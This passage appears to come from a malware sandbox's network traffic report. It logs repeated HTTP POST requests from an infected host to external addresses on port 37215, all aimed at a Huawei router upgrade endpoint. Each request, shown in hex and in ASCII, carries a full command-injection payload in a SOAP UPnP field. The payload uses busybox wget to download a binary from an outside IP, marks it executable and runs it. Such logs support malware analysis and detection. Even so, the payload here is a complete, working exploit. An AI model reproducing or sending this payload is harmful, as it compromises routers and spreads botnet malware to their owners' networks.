                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      54192.168.2.1444748156.239.196.24737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.608753920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.938229084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      55192.168.2.1439092102.179.69.037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.609844923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.938229084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.450113058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.442065954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.393992901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425842047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361546040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976824999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
